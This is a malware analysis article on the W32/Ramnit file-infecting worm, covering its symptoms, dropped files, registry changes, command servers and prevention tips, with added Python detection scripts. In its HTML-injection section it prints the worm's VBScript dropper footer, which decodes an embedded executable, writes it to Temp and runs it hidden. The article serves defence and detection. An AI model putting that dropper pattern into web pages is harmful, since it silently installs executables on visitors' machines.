While Stuxnet still dominates the headlines today, we also need to stay alert to new malware variants whose authors have worked hard to make their presence felt. One family that deserves attention is detected as W32/Ramnit by Norman Security Suite. Ramnit variants are currently spreading rapidly around the world.
The W32/Ramnit malware family
Ramnit is not actually a new malware family; it was already spreading actively in 2010. It was simply overshadowed by malware such as the LNK (shortcut) exploit, Sality and Stuxnet, so neither analysts nor computer users around the world paid it much attention.
Like Stuxnet, the first W32/Ramnit variant appeared in mid-July and August 2010. The second W32/Ramnit variant appeared in October and November 2010, alongside the Sality shortcut (LNK) attacks. In mid-January 2011 a third variant of the W32/Ramnit family is now emerging, following in its predecessors' footsteps by using the LNK (shortcut) security hole to infect and spread.
Characteristics of W32/Ramnit
One reason to be careful is that W32/Ramnit belongs to the group of file-infecting viruses, like Sality, Virut and Alman. This is a scourge for computer users, because a virus that infects files, especially executable (application) files, is difficult to clean.
W32/Ramnit is a virus variant that infects executable (application) files. It does not stop at executables: it also infects web files (HTML) and DLL (dynamic link library) files.
In addition, if the computer is connected to the internet, Ramnit contacts a remote server (an IRC server) and connects to several zombie server addresses to download a bundle of other malware (viruses, trojans, spyware). At certain times W32/Ramnit shows pop-up ads with pornographic and gambling (casino) content, as well as other commercial advertising, which makes browsing and surfing uncomfortable.
Imagine this happening on a computer used by an under-age child and protected with Parental Control software. For parents it is a disaster to find their child exposed to pornography (since the pornographic content being displayed may well slip past the installed Parental Control), and for the child the supposed protection against the tide of pornography turns out to have been tricked.
By also exploiting the LNK (shortcut) security hole, Ramnit infects users' computers more easily and quickly. Although not all three W32/Ramnit variants use the LNK (shortcut) security hole, almost all W32/Ramnit variants are very difficult to clean.
Symptoms & Effects of W32/Ramnit
Some symptoms that occur if you are infected:
* Pop-up ads or pop-ups with pornographic / gambling content
At certain times the browser opens pop-up ads or pop-ups containing pornographic or gambling (casino) content. This can make the computer user uncomfortable.
* Script error pop-ups after the pop-up ads appear
After the pop-up ads appear, the browser shows a pop-up error or script error. This script error looks much like the one produced by the "ARP Spoofing" virus of 2008.
* Infection of EXE and DLL files
Like the Sality, Alman and Virut malware variants, W32/Ramnit infects EXE files. In addition, W32/Ramnit also infects DLL (dynamic link library) files.
Infected EXE and DLL files grow by roughly 100-120 KB, depending on the Ramnit variant that infected them. Even so, not every EXE and DLL file gets infected.
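A file-integrity check is the practical way to confirm this symptom. The following is an added example written for this article (not code from the original post or from any antivirus vendor): it records the size and SHA-256 of every EXE and DLL under a directory, re-scans later, and flags files whose hash changed and whose growth falls in the 100-120 KB range described above. The directory tree, the 110 KB appended body and the function names are all constructed for the demonstration.

```python
import hashlib
import os
import tempfile

# Size growth the article attributes to a Ramnit infection (about 100-120 KB).
GROWTH_MIN = 100 * 1024
GROWTH_MAX = 120 * 1024
TARGET_EXT = {".exe", ".dll"}


def sha256_of(path):
    """SHA-256 of a file, read in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Record size and SHA-256 of every .exe/.dll under root, keyed by relative path."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in TARGET_EXT:
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = {
                    "size": os.path.getsize(full),
                    "sha256": sha256_of(full),
                }
    return baseline


def compare_to_baseline(root, baseline):
    """Return (path, kind, size_delta) for every file that changed since the baseline.

    kind is 'growth_in_ramnit_range' when the hash changed and the file grew by
    100-120 KB, 'modified' for any other content change, 'missing' or 'new'.
    """
    findings = []
    current = build_baseline(root)
    for rel, old in baseline.items():
        new = current.get(rel)
        if new is None:
            findings.append((rel, "missing", None))
            continue
        if new["sha256"] != old["sha256"]:
            delta = new["size"] - old["size"]
            kind = "growth_in_ramnit_range" if GROWTH_MIN <= delta <= GROWTH_MAX else "modified"
            findings.append((rel, kind, delta))
    for rel in current:
        if rel not in baseline:
            findings.append((rel, "new", None))
    return findings


def demo():
    """Constructed demo: a small tree, a baseline, then one file appended with 110 KB."""
    root = tempfile.mkdtemp()
    samples = {
        "app.exe": b"MZ" + b"\x00" * 4096,   # constructed stand-in for an application
        "lib.dll": b"MZ" + b"\x00" * 2048,   # constructed stand-in for a library
        "notes.txt": b"ignored",             # not an EXE/DLL, so never recorded
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as f:
            f.write(data)
    baseline = build_baseline(root)
    # Simulate an appended infection body of 110 KB on app.exe (constructed, not a real sample).
    with open(os.path.join(root, "app.exe"), "ab") as f:
        f.write(b"\x90" * (110 * 1024))
    return compare_to_baseline(root, baseline)


if __name__ == "__main__":
    for path, kind, delta in demo():
        print(path, kind, delta)
```

In practice the baseline is taken on a known-clean machine (or right after installation) and stored off the host, since a file infector can just as easily rewrite a baseline kept beside the files it infects.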
* Injection of HTML files
Besides infecting EXE and DLL files, W32/Ramnit also injects HTML files. The injection is done by adding a header and a footer.
In the header, W32/Ramnit adds the script:
DropFileName = "svchost.exe"
In the footer, W32/Ramnit adds the script:
Set FSO = CreateObject("Scripting.FileSystemObject")
' GetSpecialFolder(2) is the user's Temp folder; the dropped file is written there
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath) = False Then
    Set fileobj = FSO.CreateTextFile(DropPath, True)
    ' WriteData holds the executable as a hex string (not shown here); it is decoded two characters at a time
    For i = 1 To Len(WriteData) Step 2
        fileobj.write Chr(CLng("&H" & Mid(WriteData, i, 2)))
    Next
    fileobj.close
End If
Set WshShell = CreateObject("WScript.Shell")
' window style 0 runs the dropped file hidden
WshShell.Run DropPath, 0
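To find HTML files carrying this injection on a web server, a file share or a mapped drive, you can scan for the distinctive pieces of the header and footer above. The following scanner is an added example written for this article, not code from the original post; the marker names, the threshold of three markers and the sample files it builds in a temporary directory are assumptions made for the demonstration.

```python
import os
import re
import tempfile

# Fragments of the injected header/footer described in the article.
MARKERS = [
    ("drop_filename", re.compile(r'DropFileName\s*=\s*"[^"]+"', re.I)),
    ("fso", re.compile(r'CreateObject\s*\(\s*"Scripting\.FileSystemObject"\s*\)', re.I)),
    ("temp_folder", re.compile(r'GetSpecialFolder\s*\(\s*2\s*\)', re.I)),
    ("hex_decode", re.compile(r'Chr\s*\(\s*CLng\s*\(\s*"&H"', re.I)),
    ("wsh_shell", re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.I)),
    ("hidden_run", re.compile(r'\.Run\s+DropPath\s*,\s*0', re.I)),
]


def scan_html(text):
    """Return the names of the injection markers present in one HTML document."""
    return [name for name, rx in MARKERS if rx.search(text)]


def scan_tree(root, threshold=3):
    """Walk root and report .htm/.html files with at least `threshold` markers."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in (".htm", ".html"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as f:
                hits = scan_html(f.read())
            if len(hits) >= threshold:
                results[os.path.relpath(full, root)] = hits
    return results


# Constructed clean page.
CLEAN = "<html><body><p>Company intranet</p></body></html>\n"

# Constructed page carrying the header/footer shown in the article (payload data omitted).
INJECTED = CLEAN + r'''<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath) = False Then
Set fileobj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
fileobj.write Chr(CLng("&H" & Mid(WriteData, i, 2)))
Next
fileobj.close
End If
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run DropPath, 0
//--></SCRIPT>
'''


def demo():
    """Write one clean and one injected file to a temp directory and scan it."""
    root = tempfile.mkdtemp()
    for name, body in (("index.html", CLEAN), ("injected.htm", INJECTED)):
        with open(os.path.join(root, name), "w", encoding="utf-8") as f:
            f.write(body)
    return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```

A threshold of three keeps a page that merely mentions Scripting.FileSystemObject in documentation from being reported, while an injected page matches all six. Because the worm writes the same footer into every HTML file it can reach, a hit on one file is a strong reason to scan the whole share and every machine that mapped it.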
Blanking the Windows Services function
By injecting the services.exe and IEXPLORE.EXE files, and by adding its script to web files (htm / html), the worm makes the Windows Services function appear blank.
* The computer hangs / runs slowly, and the network connection may even drop.
The Windows system files that W32/Ramnit targets for injection are:
* C:\WINDOWS\system32\svchost.exe (system file associated with the network connection; injecting it causes the network to disconnect)
* C:\WINDOWS\system32\lsass.exe (system file associated with computer activity; injecting it causes the computer to hang / slow down)
* C:\WINDOWS\system32\services.exe (system file associated with running services and drivers)
* C:\Program Files\Internet Explorer\IEXPLORE.EXE (executable file of the Internet Explorer browser)
* Active in memory
W32/Ramnit tries to connect to the remote server using the injected Internet Explorer. This can be seen in Task Manager: IEXPLORE.EXE is running even though we have not opened Internet Explorer.
* Connecting to a remote server
W32/Ramnit connects to the remote server to deliver the information it needs to send. The remote servers it uses include:
195.2.252.247
195.2.252.252
69.50.193.157
74.125.227.17
74.125.227.18
74.125.227.20
95.211.127.69
* Transferring data to the remote server
Besides connecting to and communicating with the remote server, W32/Ramnit also tries to transfer data from the victim's computer to the remote server and, in the other direction, to send malware files to the victim's computer.
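From the defender's side, these addresses are indicators you can match against proxy or firewall logs. The following is an added example written for this article (not from the original post): it parses constructed log lines in a simple "timestamp src dst port host process" layout, matches destinations against the server list above and the ADX.ADNXS.COM host the article also names as the broadcast target, and additionally flags a browser process talking to an IRC port, which is a heuristic drawn from the article's remark about an IRC server rather than a documented Ramnit signature. The log format, the sample lines and the port list are assumptions.

```python
import re

# Remote server addresses listed in the article.
RAMNIT_IPS = {
    "195.2.252.247", "195.2.252.252", "69.50.193.157",
    "74.125.227.17", "74.125.227.18", "74.125.227.20", "95.211.127.69",
}
# Host the article names as the one address Ramnit broadcasts to.
RAMNIT_HOSTS = {"adx.adnxs.com"}
# Heuristic (assumption): the article says Ramnit talks to an IRC server through the
# injected Internet Explorer, so a browser process on a classic IRC port is suspicious.
IRC_PORTS = {6667, 6668, 6669}
BROWSER_PROCS = {"iexplore.exe"}

# Constructed log lines: "timestamp src_ip dst_ip dst_port host process" ('-' = no host name).
SAMPLE_LOG = """\
2011-01-18T09:12:01 192.168.1.25 195.2.252.247 6667 - iexplore.exe
2011-01-18T09:12:04 192.168.1.25 203.0.113.10 443 adx.adnxs.com iexplore.exe
2011-01-18T09:12:09 192.168.1.25 203.0.113.20 80 example.org iexplore.exe
2011-01-18T09:13:00 192.168.1.40 198.51.100.7 6667 irc.example.net mirc.exe
2011-01-18T09:13:30 192.168.1.25 95.211.127.69 80 - svchost.exe
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+(?P<proc>\S+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not fit the layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    return rec


def classify(rec):
    """Return the list of reasons a record matches the Ramnit indicators (empty if none)."""
    reasons = []
    if rec["dst"] in RAMNIT_IPS:
        reasons.append("known_ramnit_ip")
    if rec["host"].lower() in RAMNIT_HOSTS:
        reasons.append("known_ramnit_host")
    if rec["port"] in IRC_PORTS and rec["proc"].lower() in BROWSER_PROCS:
        reasons.append("browser_to_irc_port")
    return reasons


def scan_log(text):
    """Return (timestamp, src, dst, process, reasons) for every matching line."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append((rec["ts"], rec["src"], rec["dst"], rec["proc"], reasons))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

IP-only indicators age quickly, some of the listed addresses sit inside large provider ranges, and adnxs.com is an advertising network domain that browsers also reach legitimately, so treat a single hit as a lead to confirm against the process and file findings elsewhere in this article rather than as proof of infection. The mIRC line in the sample is deliberately not flagged: the IRC-port heuristic only fires for a browser process.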
Broadcasting
Like the Conficker worm, W32/Ramnit also broadcasts on the network. The difference is that W32/Ramnit only does so to a single address, namely ADX.ADNXS.COM.
The W32/Ramnit virus file
The W32/Ramnit malware is written in the C programming language and compressed with UPX. The malware file has the following characteristics:
* Size 105 KB
* File type 'Application'
* Uses the "music folder" icon
* Extension "exe"
When run, W32/Ramnit injects the following Windows system files:
* C:\WINDOWS\system32\lsass.exe
* C:\WINDOWS\system32\svchost.exe
* C:\WINDOWS\system32\services.exe
* C:\Program Files\Internet Explorer\IEXPLORE.EXE
If connected to the internet, W32/Ramnit downloads the following malware files and folders:
* C:\Documents and Settings\%username%\Local Settings\Temp\[number].tmp
* C:\Documents and Settings\%username%\Local Settings\Temp\explorer.dat
* C:\Documents and Settings\%username%\Local Settings\Temp\winlogon.dat
* C:\Documents and Settings\%username%\Local Settings\Temp\[random_name].exe
* C:\Documents and Settings\%username%\Start Menu\Programs\[random_name].exe
* C:\Program Files\Internet Explorer\complete.dat
* C:\Program Files\Internet Explorer\dmlconf.dat
* C:\Program Files\win\[random_number].exe
* C:\Program Files\qwe
* C:\WINDOWS\[random_name].exe
* C:\WINDOWS\System32\[random_name].etc
* C:\WINDOWS\Temp\[number].tmp
In addition, W32/Ramnit injects the following files (if present):
* C:\contacts.html
* C:\Inetpub\wwwroot\index.html
* C:\Program Files\Common Files\designer\MSADDNDR.DLL
* C:\Program Files\Common Files\designer\MSHTMPGD.DLL
* C:\Program Files\Common Files\designer\MSHTMPGR.DLL
* C:\Program Files\Common Files\System\ado\MDACReadme.htm
* C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL
* C:\Program Files\MSN\MSNCoreFiles\OOBE\obelog.dll
* C:\Program Files\MSN\MSNCoreFiles\OOBE\obemetal.dll
* C:\Program Files\MSN\MSNCoreFiles\OOBE\obepopc.dll
* C:\Program Files\MSN\MSNIA\custdial.dll
* C:\Program Files\MSN\MSNIA\msniasvc.exe
* C:\Program Files\MSN\MSNIA\prestp.exe
* C:\Program Files\MSN\MsnInstaller\iasvcstb.dll
* C:\Program Files\MSN\MsnInstaller\msdbxi.dll
* C:\Program Files\MSN\MsnInstaller\msninst.dll
* C:\Program Files\MSN\MsnInstaller\msninst.exe
* C:\Program Files\MSN\MsnInstaller\msnsign.dll
* C:\Program Files\NetMeeting\netmeet.htm
It also creates several files on removable disks / drives, namely:
* Autorun.inf
* Copy of Shortcut to (1).lnk
* Copy of Shortcut to (2).lnk
* Copy of Shortcut to (3).lnk
* Copy of Shortcut to (4).lnk
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak1].exe
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak2].exe
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak3].exe
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak4].exe
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak5].exe
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak6].exe
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak7].exe
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak8].exe
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak9].exe
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak10].exe
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak11].exe
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak1].cpl
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak2].cpl
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak3].cpl
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak4].cpl
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak5].cpl
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak6].cpl
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak7].cpl
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak8].cpl
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak9].cpl
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak10].cpl
* RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[namaacak11].cpl
* RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak1].exe
* RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak2].exe
* RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak3].exe
* RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak4].exe
* RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak5].exe
* RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak6].exe
* RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak7].exe
* RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak1].cpl
* RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak2].cpl
* RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak3].cpl
* RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak4].cpl
* RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak5].cpl
* RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak6].cpl
* RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[namaacak7].cpl
Note: namaacak = random name
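Checking a removable drive for this set of artifacts is easy to automate. The following is an added example written for this article, not code from the original post: it looks for autorun.inf launch directives, the "Copy of Shortcut to (N).lnk" lure names and EXE or CPL payloads under RECYCLER\S-...\ folders, and builds a constructed drive layout in a temporary directory to run against. The autorun.inf contents and the payload file names in the demo are constructed, not recovered from a real sample.

```python
import os
import re
import tempfile

# Lure names the article lists on infected removable drives.
SHORTCUT_RE = re.compile(r"^Copy of Shortcut to \(\d+\)\.lnk$", re.I)
# RECYCLER sub-folders named like a SID (S-n-n-n-...), as in the article's listing.
SID_DIR_RE = re.compile(r"^S-\d+(?:-\d+)+$")
PAYLOAD_EXT = {".exe", ".cpl"}

# One of the folder names from the article, reused for the constructed demo drive.
SAMPLE_SID = "S-3-4-70-7603517533-1567780477-325265274-3130"


def parse_autorun(text):
    """Return the targets of autorun.inf launch directives: open=, shellexecute=, shell\\...\\command=."""
    launches = []
    for raw in text.splitlines():
        line = raw.strip()
        if "=" not in line or line.startswith(";") or line.startswith("["):
            continue
        key, val = line.split("=", 1)
        k = key.strip().lower()
        if k in ("open", "shellexecute") or (k.startswith("shell\\") and k.endswith("\\command")):
            launches.append(val.strip())
    return launches


def check_removable(root):
    """Return (kind, detail) findings for the Ramnit-style artifacts found under root."""
    findings = []
    for name in sorted(os.listdir(root)):
        if name.lower() == "autorun.inf":
            with open(os.path.join(root, name), "r", errors="replace") as f:
                for target in parse_autorun(f.read()):
                    findings.append(("autorun_launch", target))
        elif SHORTCUT_RE.match(name):
            findings.append(("lnk_lure", name))
    recycler = os.path.join(root, "RECYCLER")
    if os.path.isdir(recycler):
        for sid in sorted(os.listdir(recycler)):
            sid_dir = os.path.join(recycler, sid)
            if not (SID_DIR_RE.match(sid) and os.path.isdir(sid_dir)):
                continue
            for fname in sorted(os.listdir(sid_dir)):
                if os.path.splitext(fname)[1].lower() in PAYLOAD_EXT:
                    findings.append(("recycler_payload", os.path.join("RECYCLER", sid, fname)))
    return findings


def demo():
    """Build a constructed drive layout in a temp directory and check it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "RECYCLER", SAMPLE_SID))
    files = {
        # Constructed autorun.inf pointing at a payload in the RECYCLER folder.
        "Autorun.inf": "[autorun]\r\nopen=RECYCLER\\" + SAMPLE_SID + "\\xyz.exe\r\n",
        "Copy of Shortcut to (1).lnk": "",
        "Copy of Shortcut to (2).lnk": "",
        os.path.join("RECYCLER", SAMPLE_SID, "abcd.exe"): "MZ",
        os.path.join("RECYCLER", SAMPLE_SID, "abcd.cpl"): "MZ",
        "holiday.jpg": "",  # ordinary user file, must not be reported
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as f:
            f.write(body)
    return check_removable(root)


if __name__ == "__main__":
    for kind, detail in demo():
        print(kind, detail)
```

The check only reads names and the autorun.inf text; it never opens the .lnk files, which on a real infected drive are the shortcut exploit files and should be handled with Autoplay disabled (tip 8 below) and the drive mounted read-only before any inspection.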
On the network, via mapped drives, it also tries to inject files with the following names:
* Blank.htm
* Citrus Punch.htm
* Clear Day.htm
* Fiesta.htm
* Ivy.htm
* Leaves.htm
* Maize.htm
* Nature.htm
* Network Blitz.htm
* Pie Charts.htm
* Sunflower.htm
* Sweets.htm
* Technical.htm
Registry Modifications
Some of the registry modifications made by W32/Ramnit are as follows:
* Registry keys added
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[random_name] = C:\Documents and Settings\%username%\Local Settings\Temp\[random_name].exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol\FEATURE_BROWSER_EMULATION
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\International
* Registry keys deleted
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
DisableSR = 0x00000001
* Registry values changed
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
CurrentLevel =
1601 =
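A registry export (.reg file) taken from a suspect machine can be checked for these changes offline. The following is an added example written for this article, not code from the original post: a small parser for the .reg text format plus checks for the entries listed above (a Run value pointing into Local Settings\Temp, the LEGACY_60DFFE60 enumeration key, DisableSR set to 1, and changes to the Internet zone, Zones\3, settings). The export text, the random value name and the dword values are constructed for the demonstration.

```python
import re

# Constructed .reg-style export containing the kinds of entries the article lists.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"kfqwzt"="C:\\Documents and Settings\\user\\Local Settings\\Temp\\kfqwzt.exe"
"Updater"="C:\\Program Files\\Vendor\\updater.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR"=dword:00000001

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"CurrentLevel"=dword:00000000
"1601"=dword:00000000
'''

VALUE_RE = re.compile(r'^(?:"(?P<name>[^"]*)"|(?P<default>@))=(?P<val>.*)$')


def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: value}} (string and dword values)."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if current is None or not m:
            continue
        name = m.group("name") if m.group("name") is not None else "@"
        val = m.group("val")
        if val.startswith("dword:"):
            value = int(val[len("dword:"):], 16)
        elif val.startswith('"') and val.endswith('"'):
            # .reg escapes backslashes and quotes inside string values
            value = val[1:-1].replace("\\\\", "\\").replace('\\"', '"')
        else:
            value = val
        keys[current][name] = value
    return keys


def find_ramnit_indicators(keys):
    """Return (kind, where, value) for each parsed entry matching the article's registry changes."""
    findings = []
    for key, values in keys.items():
        k = key.lower()
        if k.endswith("\\currentversion\\run"):
            for name, val in values.items():
                if isinstance(val, str) and "\\local settings\\temp\\" in val.lower():
                    findings.append(("run_key_from_temp", name, val))
        if "\\enum\\root\\legacy_60dffe60" in k:
            findings.append(("legacy_60dffe60_key", key, None))
        if k.endswith("\\systemrestore") and values.get("DisableSR") == 1:
            findings.append(("system_restore_disabled", key, 1))
        if k.endswith("\\internet settings\\zones\\3"):
            for name in ("CurrentLevel", "1601"):
                if name in values:
                    findings.append(("internet_zone_setting", name, values[name]))
    return findings


if __name__ == "__main__":
    for finding in find_ramnit_indicators(parse_reg(SAMPLE_REG)):
        print(finding)
```

The Run-key check deliberately matches on the location of the target rather than on the random value name, since the name changes per infection while a startup entry launched from a user's Temp folder is unusual for legitimate software. The Updater entry in the sample is there to show that an ordinary Program Files path is not reported.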
Distribution Methods
W32/Ramnit spreads in the following ways:
* Drive-by download (exploit)
W32/Ramnit initially spread by exploiting drive-by download on Windows systems: links scattered on forums or in e-mail try to trick the user into opening them, and so do websites offering content or browser plugins for download.
* Removable drive / disk
This is the most common route among computer users. W32/Ramnit creates many files to infect a computer, and also exploits the LNK (shortcut) security hole.
W32/Ramnit infecting removable disks / drives
* Network
W32/Ramnit tries to inject certain web files (htm) on computers in the network that have mapped drives. The files are:
o Blank.htm
o Citrus Punch.htm
o Clear Day.htm
o Fiesta.htm
o Ivy.htm
o Leaves.htm
o Maize.htm
o Nature.htm
o Network Blitz.htm
o Pie Charts.htm
o Sunflower.htm
o Sweets.htm
o Technical.htm
Tips for Preventing W32/Ramnit Malware
1. Turn on Windows Firewall or use another firewall product. This prevents unwanted access.
2. Make sure the computer receives the latest updates for the Windows system. The easiest way is to use the system's "Automatic Updates" feature, or download the latest patches from the Microsoft website.
3. Use a good antivirus and keep it updated. This makes it easier to deal with new malware variants.
4. Restrict the use of administrator access. For users of Windows 7 and Vista, make sure UAC (User Account Control) is running properly.
5. Be cautious when opening e-mail attachments or receiving file transfers from strangers. Always scan them with an updated antivirus.
6. Be wary of cracks / keygens or unknown programs, because they may be infected with or contain malware.
7. Use passwords that are not easy to read or guess. Change passwords regularly, and use a different password for each account.
8. Turn off the Windows "Autoplay" feature to prevent unwanted programs on a removable drive / disk from running automatically.
9. Turn off file sharing if it is not used. If you do use file sharing, share read-only, or configure sharing only for specific users.
10. Be careful when accessing websites or forums that offer links to download or install something.